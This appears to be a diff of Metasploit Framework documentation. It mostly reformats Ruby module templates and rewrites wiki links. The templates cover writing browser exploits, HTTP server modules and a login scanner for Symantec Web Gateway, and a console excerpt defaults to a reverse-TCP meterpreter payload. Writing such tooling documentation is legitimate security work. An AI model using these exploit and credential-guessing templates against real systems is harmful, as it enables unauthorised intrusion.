 msf6 > show favorites

 Favorites
@@ -89,3 +90,18 @@ msf6 > show favorites
 [!] The favorite modules file is empty
 ```

+### Printing the list of favorite modules
+
+The list of favorite modules can be printed by supplying the `-l` flag. This is an alias for the `show favorites` and `favorites` commands.
+
+```shell
+msf6 > favorite -l
+
+Favorites
+=========
+
+   #  Name                        Disclosure Date  Rank    Check  Description
+   -  ----                        ---------------  ----    -----  -----------
+   0  exploit/multi/handler                        manual  No     Generic Payload Handler
+   1  exploit/windows/smb/psexec  1999-01-01       manual  No     Microsoft Windows Authenticated User Code Execution
+```
@@ -351,7 +351,7 @@ end

 The module will start the http server and print the repo to clone

-```
+```msf
 msf6 > use exploit/multi/http/git_clone_test
 [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
 msf6 exploit(multi/http/git_clone_test) > set srvport 9999
@@ -23,7 +23,7 @@ When the mixin is included, notice there will be the following datastore options
 * **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

-If you wish to learn how to change the default value of a datastore option, please read "[Changing the default value for a datastore option](https://github.com/rapid7/metasploit-framework/wiki/How-to-use-datastore-options#changing-the-default-value-for-a-datastore-option)"
+If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"

 ## Make a connection

@@ -1,6 +1,6 @@
 This is a step-by-step guide on how to write a HTTP login module using the latest LoginScanner and Credential APIs.

-Before we begin, it's probably a good idea to read [Creating Metasploit Framework LoginScanners](https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners), which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.
+Before we begin, it's probably a good idea to read [[Creating Metasploit Framework LoginScanners|./Creating-Metasploit-Framework-LoginScanners.md]], which explains about the APIs in-depth. The LoginScanner API can be found in the [lib/metasploit/framework/loginscanner](https://github.com/rapid7/metasploit-framework/tree/master/lib/metasploit/framework/login_scanner) directory, and the Credential API can found as a [metasploit-credential gem here](https://github.com/rapid7/metasploit-credential). You will most likely want to read them while writing the login module.

 ## Step 1: Set up your target environment

@@ -245,7 +245,6 @@ A basic auxiliary module template in our case would be something like this:
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
 require 'metasploit/framework/login_scanner/symantec_web_gateway'
 require 'metasploit/framework/credential_collection'

@@ -256,21 +255,23 @@ class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

-  def initialize(info={})
-    super(update_info(info,
-      'Name'        => 'Symantec Web Gateway Login Utility',
-      'Description' => %q{
-        This module will attempt to authenticate to a Symantec Web Gateway.
-      },
-      'Author'      => [ 'sinn3r' ],
-      'License'     => MSF_LICENSE,
-      'DefaultOptions' =>
-        {
-          'RPORT'      => 443,
-          'SSL'        => true,
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Symantec Web Gateway Login Utility',
+        'Description' => %q{
+          This module will attempt to authenticate to a Symantec Web Gateway.
+        },
+        'Author' => [ 'sinn3r' ],
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
          'SSLVersion' => 'TLS1'
        }
-    ))
+      )
+    )
  end

  def run_host(ip)
@@ -382,7 +383,7 @@ And finally, make sure your module actually works.

 Test for a successful login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [+] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Success: 'sinn3r:GoodPassword'
@@ -393,7 +394,7 @@ msf auxiliary(symantec_web_gateway_login) >

 Test for a failed login:

-```
+```msf
 msf auxiliary(symantec_web_gateway_login) > run

 [-] 192.168.1.176:443 SYMANTEC_WEB_GATEWAY - Failed: 'sinn3r:BadPass'
@@ -1,8 +1,8 @@
 The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are:

-* **[Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer)** - The most basic form of a HTTP server.
+* **[[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]]** - The most basic form of a HTTP server.
 * **[Msf::Exploit::Remote::HttpServer::HTML](https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/remote/http_server/html.rb)** - which provides Javascript functions that the module can use when crafting HTML contents.
-* **[Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer)** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.
+* **[[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]** - which includes features from both HttpServer and HttpServer::HTML, but with even more goodies. This writeup covers the [BrowserExploitServer](https://github.com/rapid7/metasploit-framework/blob/a7d255bbe5537822c614ede71933fdc6597dd369/lib/msf/core/exploit/remote/browser_exploit_server.rb) mixin.

 ### The Automatic Exploitation Procedure

@@ -139,7 +139,7 @@ def on_request_exploit(cli, request, target_info)
 	</html>
 	|
 	send_exploit_html(cli, html)
-end 
+end
 ```

 [ERB](http://ruby-doc.org/stdlib-2.1.3/libdoc/erb/rdoc/ERB.html) is a new way to write Metasploit browser exploits. If you've written one or two web applications, this is no stranger to you. When you're using the BrowserExploitServer mixin to write an exploit, what really happens is you're writing a rails template. Here's an example of using of this feature:
@@ -198,69 +198,68 @@ To get thing started, here's a code example you can use start developing your br
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "BrowserExploitServer Example",
-      'Description'    => %q{
-        This is an example of building a browser exploit using the BrowserExploitServer mixin
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'BrowserExploitServer Example',
+        'Description' => %q{
+          This is an example of building a browser exploit using the BrowserExploitServer mixin
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          [ 'URL', 'http://metasploit.com' ]
        ],
-      'Platform'       => 'win',
-      'BrowserRequirements' =>
-        {
-          :source => /script|headers/i,
+        'Platform' => 'win',
+        'BrowserRequirements' => {
+          source: /script|headers/i
        },
-      'Targets'        =>
-        [
+        'Targets' => [
          [ 'Automatic', {} ],
          [
            'Windows XP with IE 8',
            {
-              'os_name'   => 'Windows XP',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '8.0'
+              'os_name' => 'Windows XP',
+              'ua_name' => 'MSIE',
+              'ua_ver' => '8.0'
            }
          ],
          [
            'Windows 7 with IE 9',
            {
-              'os_name'   => 'Windows 7',
-              'ua_name'   => 'MSIE',
-              'ua_ver'    => '9.0'
+              'os_name' => 'Windows 7',
+              'ua_name' => 'MSIE',
+              'ua_ver' => '9.0'
            }
          ]
        ],
-      'Payload'        => { 'BadChars' => "\x00" },
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
+        'Payload' => { 'BadChars' => "\x00" },
+        'DisclosureDate' => '2013-04-01',
+        'DefaultTarget' => 0
+      )
+    )
  end

  def exploit_template(target_info)
-    template = %Q|
+    template = %(
    Data source: <%=target_info[:source]%><br>
    OS name: <%=target_info[:os_name]%><br>
    UA name: <%=target_info[:ua_name]%><br>
    UA version: <%=target_info[:ua_ver]%><br>
    Java version: <%=target_info[:java]%><br>
    Office version: <%=target_info[:office]%>
-    |
+    )

-    return template, binding()
+    return template, binding
  end

-  def on_request_exploit(cli, request, target_info)
+  def on_request_exploit(cli, _request, target_info)
    send_exploit_html(cli, exploit_template(target_info))
  end

@@ -296,7 +295,7 @@ If your BES-based exploit does not want obfuscation at all, always make sure you
 deregister_options('JsObfuscate')
 ```

-To learn more about Metasploit's JavaScript obfuscation capabilities, please read [How to obfuscate JavaScript in Metasploit](https://github.com/rapid7/metasploit-framework/wiki/How-to-obfuscate-JavaScript-in-Metasploit).
+To learn more about Metasploit's JavaScript obfuscation capabilities, please read [[How to obfuscate JavaScript in Metasploit|./How-to-obfuscate-JavaScript-in-Metasploit.md]].


 ### Related Articles:
@@ -1,4 +1,4 @@
-The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [Msf::Exploit::Remote::HttpServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-HttpServer), Msf::Exploit::Remote::HttpServer::HTML and [Msf::Exploit::Remote::BrowserExploitServer](https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer). This writeup covers the HttpServer mixin.
+The Metasploit Framework provides different mixins you can use to develop a browser exploit, mainly they are [[Msf::Exploit::Remote::HttpServer|./How-to-write-a-browser-exploit-using-HttpServer.md]], Msf::Exploit::Remote::HttpServer::HTML and [[Msf::Exploit::Remote::BrowserExploitServer|./How-to-write-a-browser-exploit-using-BrowserExploitServer.md]]. This writeup covers the HttpServer mixin.

 The HttpServer mixin is kind of the mother of all HTTP server mixins (like BrowserExploitServer and HttpServer::HTML). To use it, your module is required to have a "on_request_uri" method, which is a callback triggered when the HTTP server receives a HTTP request from the browser. An example of setting up "on_request_uri":

@@ -78,36 +78,36 @@ To get things started, you can always use the following template to start develo
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HttpServer mixin example",
-      'Description'    => %q{
-        Here's an example of using the HttpServer mixin
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     => 
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HttpServer mixin example',
+        'Description' => %q{
+          Here's an example of using the HttpServer mixin
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          [ 'URL', 'http://metasploit.com' ]
        ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Platform' => 'win',
+        'Targets' => [
          [ 'Generic', {} ],
        ],
-      'DisclosureDate' => "Apr 1 2013",
-      'DefaultTarget'  => 0))
+        'DisclosureDate' => '2013-04-01',
+        'DefaultTarget' => 0
+      )
+    )
  end

-  def on_request_uri(cli, request)
-    html = "hello"
+  def on_request_uri(cli, _request)
+    html = 'hello'
    send_response(cli, html)
  end

@@ -7,48 +7,48 @@ Say you want to exploit a web server or web application. You have code execution
 Here is how you can set it up:

 ```ruby
-
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer::HTML

-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "HttpClient and HttpServer Example",
-      'Description'    => %q{
-        This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
-        but this allows the HttpServer to terminate after a delay.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
-      'References'     =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'HttpClient and HttpServer Example',
+        'Description' => %q{
+          This demonstrates how to use two mixins (HttpClient and HttpServer) at the same time,
+          but this allows the HttpServer to terminate after a delay.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [ 'sinn3r' ],
+        'References' => [
          ['URL', 'http://metasploit.com']
        ],
-      'Payload'        => { 'BadChars' => "\x00" },
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+        'Payload' => { 'BadChars' => "\x00" },
+        'Platform' => 'win',
+        'Targets' => [
          [ 'Automatic', {} ],
        ],
-      'Privileged'     => false,
-      'DisclosureDate' => "Dec 09 2013",
-      'DefaultTarget'  => 0))
+        'Privileged' => false,
+        'DisclosureDate' => '2013-12-09',
+        'DefaultTarget' => 0
+      )
+    )

-      register_options(
-        [
-          OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
-          OptInt.new('HTTPDELAY',    [false, 'Number of seconds the web server will wait before termination', 10])
-        ], self.class)
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The path to some web application', '/']),
+        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10])
+      ], self.class
+    )
  end

  def on_request_uri(cli, req)
@@ -58,15 +58,13 @@ class MetasploitModule < Msf::Exploit::Remote

  def primer
    print_status("Sending a malicious request to #{target_uri.path}")
-    send_request_cgi({'uri'=>normalize_uri(target_uri.path)})
+    send_request_cgi({ 'uri' => normalize_uri(target_uri.path) })
  end

  def exploit
-    begin
-      Timeout.timeout(datastore['HTTPDELAY']) { super }
-    rescue Timeout::Error
-      # When the server stops due to our timeout, this is raised
-    end
+    Timeout.timeout(datastore['HTTPDELAY']) { super }
+  rescue Timeout::Error
+    # When the server stops due to our timeout, this is raised
  end
 end
 ```
@@ -82,7 +80,7 @@ In case you're wondering why the web server must terminate after a period of tim

 The output for the above example should look something like this:

-```
+```msf
 msf exploit(test) > run
 [*] Exploit running as background job.

@@ -30,7 +30,7 @@ The exploit should say what requirements are not met. The requirements are expla

 If you'd like to check the comparisons, simply set VERBOSE to true. The following is an example:

-```
+```msf
 msf exploit(ms13_022_silverlight_script_object) > set VERBOSE true
 VERBOSE => true
 msf exploit(ms13_022_silverlight_script_object) > run
@@ -1,13 +1,13 @@
 **This page is meant for Committers. If you are unsure whether you are a committer, you are not.**

-Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [Dev environment setup](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment) documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.
+Metasploit is built incrementally by the community through GitHub's [Pull Request](https://github.com/rapid7/metasploit-framework/pulls) mechanism. Submitting pull requests (or PRs) is already discussed in the [[Dev environment setup|./dev/Setting-Up-a-Metasploit-Development-Environment.md]] documentation. It's important to realize that PRs are a feature of GitHub, not git, so this document will take a look at how to get your git environment to deal with them sensibly.

 # The short story

- - Configure your git environment as described [here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#keeping-in-sync).
+ - Configure your git environment as described [[here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]].
 - Add the `fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*` line to your `.git/config`.
 - Add your signing key `git config --global user.signingkey`
-     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below: 
+     - Use `gpg --list-keys` to view your available keys. Note that on certain systems you may need to replace `gpg` with `gpg2`. Sample output can be seen below:

        ```
        pub   rsa4096 2020-04-07 [SC]
@@ -16,7 +16,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
        sub   rsa4096 2020-04-07 [E]
        ```
     - Set the GPG key as your signing key. To set the key shown above as the signing key for all repositories, one would execute:
- 
+
       ```
       git config --global user.signingkey 3198961E148FF5E527E31A5FD35E05C0F2B81E83
       ```
@@ -30,13 +30,13 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques

    Fixes #1024, also see #999.
    ````
-    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a 
+    - The `-S` flag indicates that you're going to sign the merge with your PGP/GPG key, which is a
      nice assurance that you're really you.
-    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if 
+    - The `--no-ff` flag indicates that you want to create a merge commit no matter what, even if
      the merge would normally be resolved as a fast forwards. This ensure that all changes have a
      commit associated with them.
-    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you 
-      to edit the commit message so that it conforms to Metasploit standards, rather than sticking 
+    - The `--edit` flag will drop you into your default editor (normally vim), and will allow you
+      to edit the commit message so that it conforms to Metasploit standards, rather than sticking
      with git's pre-generated commit message which does not.
  - Note that the `--no-ff` flag should be used both for PRs that go back to a contributor's branch as well as PRs that land in Metasploit's master branch.
 - If you're making changes (often the case), merge to a landing branch, then merge **that** branch to upstream/master with the `-S --no-ff --edit` options.
@@ -46,7 +46,7 @@ Metasploit is built incrementally by the community through GitHub's [Pull Reques
 Check out [this gist](https://gist.github.com/todb-r7/3fbee1a9e7b36d82ca55) that automates (mostly) landing pull requests, signing the merge commit, all while rarely losing a race with other committers.
 # Fork and clone

-First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [as described here](https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment#wiki-ssh), but the https method will work, too.
+First, fork and clone the `rapid7/metasploit-framework` repo, [following these instructions](https://help.github.com/articles/fork-a-repo). I like using ssh with `~/.ssh/config` aliases [[as described here|./dev/Setting-Up-a-Metasploit-Development-Environment.md]], but the https method will work, too.

 Once this is done, you will have a remote repository called "origin," which points to your forked repository on GitHub. You will be doing most of your work in your own fork of Metasploit, even if you have commit rights to Rapid7's fork. Now, we're going to add an "upstream" repository to talk to the Rapid7 repository.

@@ -135,7 +135,7 @@ In this particular case with PR #1217, I did want to send some changes back to t
 Here's an example with #6954 (your workflow may vary):

 ```
-$ git checkout upstream/master 
+$ git checkout upstream/master
 Note: checking out 'upstream/master'.

 You are in 'detached HEAD' state. You can look around, make experimental
@@ -258,7 +258,7 @@ c = commit -S --edit
 m = merge -S --no-ff --edit
 ````

-People with commit rights to rapid7/metasploit-framework will have their [keys listed here](https://github.com/rapid7/metasploit-framework/wiki/Committer-Keys).
+People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].

 # Post-Merge

@@ -291,4 +291,4 @@ If that works, great, you know you don't have any merge conflicts right now.

 # Questions and Corrections

-Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com. 
+Reach out in #contributors on [Metasploit Slack](https://metasploit.com/slack), or by e-mailing msfdev at metasploit dot com.
--- a/Show More
+++ b/Show More
				`@@ -0,0 +1,2 @@`
				`<link rel="stylesheet" href="{% link assets/css/main.css %}">`